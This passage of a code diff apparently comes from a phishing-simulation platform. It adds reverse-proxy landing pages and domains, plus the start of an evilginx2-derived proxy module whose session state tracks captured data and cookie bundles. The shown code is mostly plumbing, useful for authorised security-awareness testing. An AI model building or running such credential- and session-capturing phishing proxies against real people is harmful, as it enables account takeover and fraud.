m.ProxyService.GetAllOverview( + companyID, + g, + session, + queryArgs, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, proxies) +} + +// GetAll gets all proxies using pagination +func (m *Proxy) GetAll(g *gin.Context) { + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + queryArgs, ok := m.handleQueryArgs(g) + if !ok { + return + } + queryArgs.DefaultSortByUpdatedAt() + companyID := companyIDFromRequestQuery(g) + // get proxies + proxies, err := m.ProxyService.GetAll( + g, + session, + companyID, + &repository.ProxyOption{ + QueryArgs: queryArgs, + }, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, proxies) +} + +// GetByID gets a proxy by ID +func (m *Proxy) GetByID(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + id, ok := m.handleParseIDParam(g) + if !ok { + return + } + // get proxy + proxy, err := m.ProxyService.GetByID( + g.Request.Context(), + session, + id, + &repository.ProxyOption{}, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, proxy) +} + +// UpdateByID updates a proxy by ID +func (m *Proxy) UpdateByID(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + id, ok := m.handleParseIDParam(g) + if !ok { + return + } + var req model.Proxy + if ok := m.handleParseRequest(g, &req); !ok { + return + } + // update proxy + err := m.ProxyService.UpdateByID( + g.Request.Context(), + session, + id, + &req, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, map[string]string{ + "message": "Proxy updated", + }) +} + +// DeleteByID deletes a proxy by ID +func (m *Proxy) DeleteByID(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + 
id, ok := m.handleParseIDParam(g) + if !ok { + return + } + // delete proxy + err := m.ProxyService.DeleteByID( + g.Request.Context(), + session, + id, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, map[string]string{ + "message": "Proxy deleted", + }) +} diff --git a/backend/data/option.go b/backend/data/option.go index 8aa8826..c0b583c 100644 --- a/backend/data/option.go +++ b/backend/data/option.go @@ -23,4 +23,6 @@ const ( OptionKeyRepeatOffenderMonths = "repeat_offender_months" OptionKeyAdminSSOLogin = "sso_login" + + OptionKeyProxyCookieName = "proxy_cookie_name" ) diff --git a/backend/database/campaignTemplate.go b/backend/database/campaignTemplate.go index 4fcb23d..cef2816 100644 --- a/backend/database/campaignTemplate.go +++ b/backend/database/campaignTemplate.go @@ -29,6 +29,10 @@ type CampaignTemplate struct { LandingPageID *uuid.UUID `gorm:"type:uuid;index;"` LandingPage *Page `gorm:"references:LandingPage;foreignKey:LandingPageID;references:ID;"` + // landing page can also be a proxy + LandingProxyID *uuid.UUID `gorm:"type:uuid;index;"` + LandingProxy *Proxy `gorm:"foreignKey:LandingProxyID;references:ID;"` + DomainID *uuid.UUID `gorm:"type:uuid;index;"` Domain *Domain `gorm:"foreignKey:DomainID"` @@ -42,9 +46,17 @@ type CampaignTemplate struct { BeforeLandingPageID *uuid.UUID `gorm:"type:uuid;index"` BeforeLandingPage *Page `gorm:"foreignkey:BeforeLandingPageID;references:ID"` + // before landing page can also be a proxy + BeforeLandingProxyID *uuid.UUID `gorm:"type:uuid;index"` + BeforeLandingProxy *Proxy `gorm:"foreignKey:BeforeLandingProxyID;references:ID"` + AfterLandingPageID *uuid.UUID `gorm:"type:uuid;index"` AfterLandingPage *Page `gorm:"foreignKey:AfterLandingPageID;references:ID"` + // after landing page can also be a proxy + AfterLandingProxyID *uuid.UUID `gorm:"type:uuid;index"` + AfterLandingProxy *Proxy `gorm:"foreignKey:AfterLandingProxyID;references:ID"` + AfterLandingPageRedirectURL 
string `gorm:"not null;"` EmailID *uuid.UUID `gorm:"type:uuid;index;"` diff --git a/backend/database/domain.go b/backend/database/domain.go index 17ce013..445ba9b 100644 --- a/backend/database/domain.go +++ b/backend/database/domain.go @@ -12,14 +12,18 @@ const ( // Domain is gorm data model type Domain struct { - ID uuid.UUID `gorm:"primary_key;not null;unique;type:uuid;"` - CreatedAt *time.Time `gorm:"not null;index;"` - UpdatedAt *time.Time `gorm:"not null;index;"` - CompanyID *uuid.UUID `gorm:"index;type:uuid;"` - Name string `gorm:"not null;unique;"` - ManagedTLSCerts bool `gorm:"not null;index;default:false"` - OwnManagedTLS bool `gorm:"not null;index;default:false"` - HostWebsite bool `gorm:"not null;"` + ID uuid.UUID `gorm:"primary_key;not null;unique;type:uuid;"` + CreatedAt *time.Time `gorm:"not null;index;"` + UpdatedAt *time.Time `gorm:"not null;index;"` + CompanyID *uuid.UUID `gorm:"index;type:uuid;"` + ProxyID *uuid.UUID `gorm:"index;type:uuid;"` + Name string `gorm:"not null;unique;"` + Type string `gorm:"not null;default:'regular';"` + ProxyTargetDomain string + + ManagedTLSCerts bool `gorm:"not null;index;default:false"` + OwnManagedTLS bool `gorm:"not null;index;default:false"` + HostWebsite bool `gorm:"not null;"` PageContent string PageNotFoundContent string RedirectURL string diff --git a/backend/database/page.go b/backend/database/page.go index 1f37cfe..77bae06 100644 --- a/backend/database/page.go +++ b/backend/database/page.go @@ -13,12 +13,15 @@ const ( // Page is a gorm data model type Page struct { - ID *uuid.UUID `gorm:"primary_key;not null;unique;type:uuid"` - CreatedAt *time.Time `gorm:"not null;index;"` - UpdatedAt *time.Time `gorm:"not null;index"` - CompanyID *uuid.UUID `gorm:"index;uniqueIndex:idx_pages_unique_name_and_company_id;type:uuid"` - Name string `gorm:"not null;index;uniqueIndex:idx_pages_unique_name_and_company_id;"` - Content string `gorm:"not null;"` + ID *uuid.UUID `gorm:"primary_key;not null;unique;type:uuid"` + 
CreatedAt *time.Time `gorm:"not null;index;"` + UpdatedAt *time.Time `gorm:"not null;index"` + CompanyID *uuid.UUID `gorm:"index;uniqueIndex:idx_pages_unique_name_and_company_id;type:uuid"` + Name string `gorm:"not null;index;uniqueIndex:idx_pages_unique_name_and_company_id;"` + Content string `gorm:"not null;"` + Type string `gorm:"not null;default:'regular';"` + TargetURL string + ProxyConfig string // could has-one Company *Company diff --git a/backend/database/proxy.go b/backend/database/proxy.go new file mode 100644 index 0000000..2497b3e --- /dev/null +++ b/backend/database/proxy.go @@ -0,0 +1,37 @@ +package database + +import ( + "time" + + "github.com/google/uuid" + "gorm.io/gorm" +) + +const ( + PROXY_TABLE = "proxies" +) + +// Proxy is a gorm data model +type Proxy struct { + ID *uuid.UUID `gorm:"primary_key;not null;unique;type:uuid"` + CreatedAt *time.Time `gorm:"not null;index;"` + UpdatedAt *time.Time `gorm:"not null;index"` + CompanyID *uuid.UUID `gorm:"index;uniqueIndex:idx_proxies_unique_name_and_company_id;type:uuid"` + Name string `gorm:"not null;index;uniqueIndex:idx_proxies_unique_name_and_company_id;"` + Description string `gorm:"type:text"` + StartURL string `gorm:"not null;"` + ProxyConfig string `gorm:"type:text;not null;"` + + // could has-one + Company *Company +} + +func (e *Proxy) Migrate(db *gorm.DB) error { + // SQLITE + // ensure name + company id is unique + return UniqueIndexNameAndNullCompanyID(db, "proxies") +} + +func (Proxy) TableName() string { + return PROXY_TABLE +} diff --git a/backend/main.go b/backend/main.go index ef69f2a..92ab682 100644 --- a/backend/main.go +++ b/backend/main.go @@ -130,7 +130,7 @@ func main() { *flagConfigPath, ) if err != nil { - golog.Fatalf("failed to config: %s", err) + golog.Fatalf("failed to setup config: %s", err) } // setup database connection db, err := app.SetupDatabase(conf) diff --git a/backend/model/campaignTemplate.go b/backend/model/campaignTemplate.go index 2107cf3..b5eb9d7 100644 --- 
a/backend/model/campaignTemplate.go +++ b/backend/model/campaignTemplate.go @@ -26,12 +26,24 @@ type CampaignTemplate struct { BeforeLandingPageID nullable.Nullable[uuid.UUID] `json:"beforeLandingPageID"` BeforeLandingePage *Page `json:"beforeLandingPage"` + // before landing page can also be a proxy + BeforeLandingProxyID nullable.Nullable[uuid.UUID] `json:"beforeLandingProxyID"` + BeforeLandingProxy *Proxy `json:"beforeLandingProxy"` + LandingPageID nullable.Nullable[uuid.UUID] `json:"landingPageID"` LandingPage *Page `json:"landingPage"` + // landing page can also be a proxy + LandingProxyID nullable.Nullable[uuid.UUID] `json:"landingProxyID"` + LandingProxy *Proxy `json:"landingProxy"` + AfterLandingPageID nullable.Nullable[uuid.UUID] `json:"afterLandingPageID"` AfterLandingPage *Page `json:"afterLandingPage"` + // after landing page can also be a proxy + AfterLandingProxyID nullable.Nullable[uuid.UUID] `json:"afterLandingProxyID"` + AfterLandingProxy *Proxy `json:"afterLandingProxy"` + AfterLandingPageRedirectURL nullable.Nullable[vo.OptionalString255] `json:"afterLandingPageRedirectURL"` URLIdentifierID nullable.Nullable[*uuid.UUID] `json:"urlIdentifierID"` @@ -80,6 +92,41 @@ func (c *CampaignTemplate) Validate() error { if err := validate.NullableFieldRequired("urlPath", c.URLPath); err != nil { return err } + + // validate that only one type is set per stage + // before landing page: can have neither (optional), or one type, but not both + _, errBeforePage := c.BeforeLandingPageID.Get() + _, errBeforeProxy := c.BeforeLandingProxyID.Get() + if errBeforePage == nil && errBeforeProxy == nil { + return errs.NewValidationError( + errors.New("before landing page cannot be both a page and a proxy"), + ) + } + + // landing page: must have exactly one type (required) + _, errLandingPage := c.LandingPageID.Get() + _, errLandingProxy := c.LandingProxyID.Get() + if errLandingPage == nil && errLandingProxy == nil { + return errs.NewValidationError( + errors.New("landing 
page cannot be both a page and a proxy"), + ) + + } + if errLandingPage != nil && errLandingProxy != nil { + return errs.NewValidationError( + errors.New("landing page is required (must be either a page or a proxy)"), + ) + } + + // after landing page: can have neither (optional), or one type, but not both + _, errAfterPage := c.AfterLandingPageID.Get() + _, errAfterProxy := c.AfterLandingProxyID.Get() + if errAfterPage == nil && errAfterProxy == nil { + return errs.NewValidationError( + errors.New("after landing page cannot be both a page and a proxy"), + ) + } + return nil } @@ -110,6 +157,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { } } + if c.BeforeLandingProxyID.IsSpecified() { + if c.BeforeLandingProxyID.IsNull() { + m["before_landing_proxy_id"] = nil + } else { + m["before_landing_proxy_id"] = c.BeforeLandingProxyID.MustGet() + } + } + if c.LandingPageID.IsSpecified() { if c.LandingPageID.IsNull() { m["landing_page_id"] = nil @@ -118,6 +173,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { } } + if c.LandingProxyID.IsSpecified() { + if c.LandingProxyID.IsNull() { + m["landing_proxy_id"] = nil + } else { + m["landing_proxy_id"] = c.LandingProxyID.MustGet() + } + } + if c.AfterLandingPageID.IsSpecified() { if c.AfterLandingPageID.IsNull() { m["after_landing_page_id"] = nil @@ -125,6 +188,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { m["after_landing_page_id"] = c.AfterLandingPageID.MustGet() } } + + if c.AfterLandingProxyID.IsSpecified() { + if c.AfterLandingProxyID.IsNull() { + m["after_landing_proxy_id"] = nil + } else { + m["after_landing_proxy_id"] = c.AfterLandingProxyID.MustGet() + } + } if c.AfterLandingPageRedirectURL.IsSpecified() { if c.AfterLandingPageRedirectURL.IsNull() { m["after_landing_page_redirect_url"] = nil @@ -177,10 +248,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { _, errAPISender := c.APISenderID.Get() _, errEmail := c.EmailID.Get() _, errLandingPage := c.LandingPageID.Get() + _, 
errLandingProxy := c.LandingProxyID.Get() + + // landing page is required (either page or proxy) + hasLanding := errLandingPage == nil || errLandingProxy == nil m["is_usable"] = errDomain == nil && errEmail == nil && - errLandingPage == nil && + hasLanding && (errSMTP == nil || errAPISender == nil) return m diff --git a/backend/model/domain.go b/backend/model/domain.go index 49324e7..b9ea991 100644 --- a/backend/model/domain.go +++ b/backend/model/domain.go @@ -13,13 +13,15 @@ import ( ) type Domain struct { - ID nullable.Nullable[uuid.UUID] `json:"id"` - CreatedAt *time.Time `json:"createdAt"` - UpdatedAt *time.Time `json:"updatedAt"` - Name nullable.Nullable[vo.String255] `json:"name"` - HostWebsite nullable.Nullable[bool] `json:"hostWebsite"` - ManagedTLS nullable.Nullable[bool] `json:"managedTLS"` - OwnManagedTLS nullable.Nullable[bool] `json:"ownManagedTLS"` + ID nullable.Nullable[uuid.UUID] `json:"id"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + Name nullable.Nullable[vo.String255] `json:"name"` + Type nullable.Nullable[vo.String32] `json:"type"` // "regular" or "proxy" + ProxyTargetDomain nullable.Nullable[vo.OptionalString255] `json:"proxyTargetDomain"` // target URL for proxy (can be full URL or domain) + HostWebsite nullable.Nullable[bool] `json:"hostWebsite"` + ManagedTLS nullable.Nullable[bool] `json:"managedTLS"` + OwnManagedTLS nullable.Nullable[bool] `json:"ownManagedTLS"` // private key OwnManagedTLSKey nullable.Nullable[string] `json:"ownManagedTLSKey"` // cert @@ -28,6 +30,7 @@ type Domain struct { PageNotFoundContent nullable.Nullable[vo.OptionalString1MB] `json:"pageNotFoundContent"` RedirectURL nullable.Nullable[vo.OptionalString1024] `json:"redirectURL"` CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` + ProxyID nullable.Nullable[uuid.UUID] `json:"proxyID"` Company *Company `json:"company"` } @@ -36,20 +39,45 @@ func (d *Domain) Validate() error { if err := 
validate.NullableFieldRequired("name", d.Name); err != nil { return err } - if err := validate.NullableFieldRequired("hostWebsite", d.HostWebsite); err != nil { - return err + + // set default type if not specified + if !d.Type.IsSpecified() { + d.Type.Set(*vo.NewString32Must("regular")) } - if err := validate.NullableFieldRequired("managedTLS", d.ManagedTLS); err != nil { - return err + + domainType, err := d.Type.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("type is required"), "type") } - if err := validate.NullableFieldRequired("pageContent", d.PageContent); err != nil { - return err + + // validate type is either "regular" or "proxy" + if domainType.String() != "regular" && domainType.String() != "proxy" { + return validate.WrapErrorWithField(errors.New("type must be 'regular' or 'proxy'"), "type") } - if err := validate.NullableFieldRequired("pageNotFoundContent", d.PageNotFoundContent); err != nil { - return err - } - if err := validate.NullableFieldRequired("redirectURL", d.RedirectURL); err != nil { - return err + + if domainType.String() == "proxy" { + // proxy domains require proxyTargetDomain + if err := validate.NullableFieldRequired("proxyTargetDomain", d.ProxyTargetDomain); err != nil { + return err + } + // proxy domains don't need page content validation + } else { + // regular domains need standard validation + if err := validate.NullableFieldRequired("hostWebsite", d.HostWebsite); err != nil { + return err + } + if err := validate.NullableFieldRequired("managedTLS", d.ManagedTLS); err != nil { + return err + } + if err := validate.NullableFieldRequired("pageContent", d.PageContent); err != nil { + return err + } + if err := validate.NullableFieldRequired("pageNotFoundContent", d.PageNotFoundContent); err != nil { + return err + } + if err := validate.NullableFieldRequired("redirectURL", d.RedirectURL); err != nil { + return err + } } // // @@ -101,6 +129,18 @@ func (d *Domain) ToDBMap() map[string]any { m["name"] = 
name.String() } } + if d.Type.IsSpecified() { + m["type"] = "regular" + if domainType, err := d.Type.Get(); err == nil { + m["type"] = domainType.String() + } + } + if d.ProxyTargetDomain.IsSpecified() { + m["proxy_target_domain"] = nil + if proxyTargetDomain, err := d.ProxyTargetDomain.Get(); err == nil { + m["proxy_target_domain"] = proxyTargetDomain.String() + } + } if d.HostWebsite.IsSpecified() { m["host_website"] = nil if hostWebsite, err := d.HostWebsite.Get(); err == nil { @@ -149,18 +189,28 @@ func (d *Domain) ToDBMap() map[string]any { m["own_managed_tls"] = d.OwnManagedTLS.MustGet() } } + if d.ProxyID.IsSpecified() { + if d.ProxyID.IsNull() { + m["proxy_id"] = nil + } else { + m["proxy_id"] = d.ProxyID.MustGet() + } + } return m } // DomainOverview is a subset of the domain as used as read-only type DomainOverview struct { - ID uuid.UUID `json:"id,omitempty"` - CreatedAt *time.Time `json:"createdAt"` - UpdatedAt *time.Time `json:"updatedAt"` - Name string `json:"name"` - HostWebsite bool `json:"hostWebsite"` - ManagedTLS bool `json:"managedTLS"` - OwnManagedTLS bool `json:"ownManagedTLS"` - RedirectURL string `json:"redirectURL"` - CompanyID *uuid.UUID `json:"companyID"` + ID uuid.UUID `json:"id,omitempty"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + Name string `json:"name"` + Type string `json:"type"` + ProxyTargetDomain string `json:"proxyTargetDomain"` + HostWebsite bool `json:"hostWebsite"` + ManagedTLS bool `json:"managedTLS"` + OwnManagedTLS bool `json:"ownManagedTLS"` + RedirectURL string `json:"redirectURL"` + CompanyID *uuid.UUID `json:"companyID"` + ProxyID *uuid.UUID `json:"proxyID"` } diff --git a/backend/model/page.go b/backend/model/page.go index ce6348d..1adedeb 100644 --- a/backend/model/page.go +++ b/backend/model/page.go @@ -3,6 +3,7 @@ package model import ( "time" + "github.com/go-errors/errors" "github.com/google/uuid" "github.com/oapi-codegen/nullable" 
"github.com/phishingclub/phishingclub/validate" @@ -11,12 +12,15 @@ import ( // Page is a Page type Page struct { - ID nullable.Nullable[uuid.UUID] `json:"id"` - CreatedAt *time.Time `json:"createdAt"` - UpdatedAt *time.Time `json:"updatedAt"` - CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` - Name nullable.Nullable[vo.String64] `json:"name"` - Content nullable.Nullable[vo.OptionalString1MB] `json:"content"` + ID nullable.Nullable[uuid.UUID] `json:"id"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` + Name nullable.Nullable[vo.String64] `json:"name"` + Content nullable.Nullable[vo.OptionalString1MB] `json:"content"` + Type nullable.Nullable[vo.String32] `json:"type"` // "regular" or "proxy" + TargetURL nullable.Nullable[vo.OptionalString1024] `json:"targetURL"` // target url for proxy pages + ProxyConfig nullable.Nullable[vo.OptionalString1MB] `json:"proxyConfig"` // yaml configuration for proxy Company *Company `json:"-"` } @@ -26,9 +30,37 @@ func (p *Page) Validate() error { if err := validate.NullableFieldRequired("name", p.Name); err != nil { return err } - if err := validate.NullableFieldRequired("content", p.Content); err != nil { - return err + + // set default type if not specified + if !p.Type.IsSpecified() { + p.Type.Set(*vo.NewString32Must("regular")) } + + pageType, err := p.Type.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("type is required"), "type") + } + + // validate type is either "regular" or "proxy" + if pageType.String() != "regular" && pageType.String() != "proxy" { + return validate.WrapErrorWithField(errors.New("type must be 'regular' or 'proxy'"), "type") + } + + if pageType.String() == "proxy" { + // proxy pages require targetURL and proxyConfig + if err := validate.NullableFieldRequired("targetURL", p.TargetURL); err != nil { + return err + } + if err := validate.NullableFieldRequired("proxyConfig", 
p.ProxyConfig); err != nil { + return err + } + } else { + // regular pages require content + if err := validate.NullableFieldRequired("content", p.Content); err != nil { + return err + } + } + return nil } @@ -49,6 +81,24 @@ func (p *Page) ToDBMap() map[string]any { m["content"] = content.String() } } + if p.Type.IsSpecified() { + m["type"] = "regular" + if pageType, err := p.Type.Get(); err == nil { + m["type"] = pageType.String() + } + } + if p.TargetURL.IsSpecified() { + m["target_url"] = nil + if targetURL, err := p.TargetURL.Get(); err == nil { + m["target_url"] = targetURL.String() + } + } + if p.ProxyConfig.IsSpecified() { + m["proxy_config"] = nil + if proxyConfig, err := p.ProxyConfig.Get(); err == nil { + m["proxy_config"] = proxyConfig.String() + } + } if p.CompanyID.IsSpecified() { if p.CompanyID.IsNull() { m["company_id"] = nil diff --git a/backend/model/proxy.go b/backend/model/proxy.go new file mode 100644 index 0000000..50e520e --- /dev/null +++ b/backend/model/proxy.go @@ -0,0 +1,108 @@ +package model + +import ( + "time" + + "github.com/go-errors/errors" + "github.com/google/uuid" + "github.com/oapi-codegen/nullable" + "github.com/phishingclub/phishingclub/validate" + "github.com/phishingclub/phishingclub/vo" +) + +// Proxy is a proxy configuration +type Proxy struct { + ID nullable.Nullable[uuid.UUID] `json:"id"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` + Name nullable.Nullable[vo.String64] `json:"name"` + Description nullable.Nullable[vo.OptionalString1024] `json:"description"` + StartURL nullable.Nullable[vo.String1024] `json:"startURL"` + ProxyConfig nullable.Nullable[vo.String1MB] `json:"proxyConfig"` + + Company *Company `json:"-"` +} + +// Validate checks if the Proxy has a valid state +func (m *Proxy) Validate() error { + if err := validate.NullableFieldRequired("name", m.Name); err != nil { + return err + } + + if err := 
validate.NullableFieldRequired("startURL", m.StartURL); err != nil { + return err + } + + if err := validate.NullableFieldRequired("proxyConfig", m.ProxyConfig); err != nil { + return err + } + + // validate start URL format + startURL, err := m.StartURL.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("start URL is required"), "startURL") + } + + startURLStr := startURL.String() + if startURLStr == "" { + return validate.WrapErrorWithField(errors.New("start URL cannot be empty"), "startURL") + } + + // validate that start URL is a valid, full URL + if err := validate.ErrorIfInvalidURL(startURLStr); err != nil { + return validate.WrapErrorWithField(err, "startURL") + } + + return nil +} + +// ToDBMap converts the fields that can be stored or updated to a map +// if the value is nullable and not set, it is not included +// if the value is nullable and set, it is included, if it is null, it is set to nil +func (m *Proxy) ToDBMap() map[string]any { + dbMap := map[string]any{} + if m.Name.IsSpecified() { + dbMap["name"] = nil + if name, err := m.Name.Get(); err == nil { + dbMap["name"] = name.String() + } + } + if m.Description.IsSpecified() { + dbMap["description"] = nil + if description, err := m.Description.Get(); err == nil { + dbMap["description"] = description.String() + } + } + if m.StartURL.IsSpecified() { + dbMap["start_url"] = nil + if startURL, err := m.StartURL.Get(); err == nil { + dbMap["start_url"] = startURL.String() + } + } + if m.ProxyConfig.IsSpecified() { + dbMap["proxy_config"] = nil + if proxyConfig, err := m.ProxyConfig.Get(); err == nil { + dbMap["proxy_config"] = proxyConfig.String() + } + } + if m.CompanyID.IsSpecified() { + if m.CompanyID.IsNull() { + dbMap["company_id"] = nil + } else { + dbMap["company_id"] = m.CompanyID.MustGet() + } + } + return dbMap +} + +// ProxyOverview is a subset of the Proxy as used as read-only +type ProxyOverview struct { + ID uuid.UUID `json:"id,omitempty"` + CreatedAt *time.Time 
`json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + Name string `json:"name"` + Description string `json:"description"` + StartURL string `json:"startURL"` + CompanyID *uuid.UUID `json:"companyID"` +} diff --git a/backend/proxy/proxy.go b/backend/proxy/proxy.go new file mode 100644 index 0000000..b047b7e --- /dev/null +++ b/backend/proxy/proxy.go @@ -0,0 +1,2091 @@ +package proxy + +import ( + "bytes" + "compress/flate" + "compress/gzip" + "context" + "crypto/tls" + "encoding/json" + "fmt" + "io" + "net/http" + "net/http/cookiejar" + "net/url" + "regexp" + "sort" + "strings" + "sync" + "sync/atomic" + "time" + + "github.com/go-errors/errors" + "github.com/google/uuid" + "github.com/phishingclub/phishingclub/cache" + "github.com/phishingclub/phishingclub/data" + "github.com/phishingclub/phishingclub/database" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" + "github.com/phishingclub/phishingclub/server" + "github.com/phishingclub/phishingclub/service" + "github.com/phishingclub/phishingclub/utils" + "github.com/phishingclub/phishingclub/vo" + "go.uber.org/zap" + "gopkg.in/yaml.v3" +) + +/* +This source file is a modified / highly inspired by evilginx2 (https://github.com/kgretzky/evilginx2/) +Which was inspired by the bettercap (https://github.com/bettercap/bettercap) project. +Evilginx is a fantastic MITM phishing project - so check it out! + +Thank you! +*/ + +/* +Portions of this code are derived from EvilGinx2 (https://github.com/kgretzky/evilginx2) +Copyright (c) 2017-2023 Kuba Gretzky (@kgretzky) +Licensed under BSD-3-Clause License + +EvilGinx2 itself incorporates code from the Bettercap project: +https://github.com/bettercap/bettercap +Copyright (c) 2016-2023 Simone Margaritelli (@evilsocket) + +This derivative work is licensed under AGPL-3.0. +See THIRD_PARTY_LICENSES.md for complete license texts. 
+*/ + +const ( + PROXY_COOKIE_MAX_AGE = 3600 + CONVERT_TO_ORIGINAL_URLS = 0 + CONVERT_TO_PHISHING_URLS = 1 +) + +var ( + MATCH_URL_REGEXP = regexp.MustCompile(`\b(http[s]?:\/\/|\\\\|http[s]:\\x2F\\x2F)(([A-Za-z0-9-]{1,63}\.)?[A-Za-z0-9]+(-[a-z0-9]+)*\.)+(arpa|root|aero|biz|cat|com|coop|edu|gov|info|int|jobs|mil|mobi|museum|name|net|org|pro|tel|travel|bot|inc|game|xyz|cloud|live|today|online|shop|tech|art|site|wiki|ink|vip|lol|club|click|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cx|cy|cz|dev|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)|(([0-9]{1,3}\.){3}[0-9]{1,3})\b`) + MATCH_URL_REGEXP_WITHOUT_SCHEME = 
regexp.MustCompile(`\b(([A-Za-z0-9-]{1,63}\.)?[A-Za-z0-9]+(-[a-z0-9]+)*\.)+(arpa|root|aero|biz|cat|com|coop|edu|gov|info|int|jobs|mil|mobi|museum|name|net|org|pro|tel|travel|bot|inc|game|xyz|cloud|live|today|online|shop|tech|art|site|wiki|ink|vip|lol|club|click|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cx|cy|cz|dev|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)|(([0-9]{1,3}\.){3}[0-9]{1,3})\b`) +) + +type ProxySession struct { + ID string + CampaignRecipientID *uuid.UUID + CampaignID *uuid.UUID + RecipientID *uuid.UUID + Campaign *model.Campaign + Domain *database.Domain + TargetDomain string + Config sync.Map // map[string]service.ProxyServiceDomainConfig + CreatedAt time.Time + RequiredCaptures sync.Map // map[string]bool + CapturedData sync.Map // map[string]map[string]string + NextPageType atomic.Value // string + IsComplete atomic.Bool + CookieBundleSubmitted atomic.Bool +} + +// RequestContext holds all the context data for a proxy request +type RequestContext struct { + SessionID string + SessionCreated bool + PhishDomain string + TargetDomain string + Domain *database.Domain + ProxyConfig *service.ProxyServiceConfigYAML + Session *ProxySession + ConfigMap map[string]service.ProxyServiceDomainConfig + CampaignRecipientID *uuid.UUID + ParamName string +} + +type ProxyHandler struct { + logger *zap.SugaredLogger + sessions sync.Map 
// map[string]*ProxySession + campaignRecipientSessions sync.Map // map[string]string (campaignRecipientID -> sessionID) + PageRepository *repository.Page + CampaignRecipientRepository *repository.CampaignRecipient + CampaignRepository *repository.Campaign + CampaignTemplateRepository *repository.CampaignTemplate + DomainRepository *repository.Domain + ProxyRepository *repository.Proxy + IdentifierRepository *repository.Identifier + CampaignService *service.Campaign + cookieName string +} + +func NewProxyHandler( + logger *zap.SugaredLogger, + pageRepository *repository.Page, + campaignRecipientRepository *repository.CampaignRecipient, + campaignRepository *repository.Campaign, + campaignTemplateRepository *repository.CampaignTemplate, + domainRepository *repository.Domain, + proxyRepository *repository.Proxy, + identifierRepository *repository.Identifier, + campaignService *service.Campaign, + cookieName string, +) *ProxyHandler { + return &ProxyHandler{ + logger: logger, + sessions: sync.Map{}, + PageRepository: pageRepository, + CampaignRecipientRepository: campaignRecipientRepository, + CampaignRepository: campaignRepository, + CampaignTemplateRepository: campaignTemplateRepository, + DomainRepository: domainRepository, + ProxyRepository: proxyRepository, + IdentifierRepository: identifierRepository, + CampaignService: campaignService, + cookieName: cookieName, + } 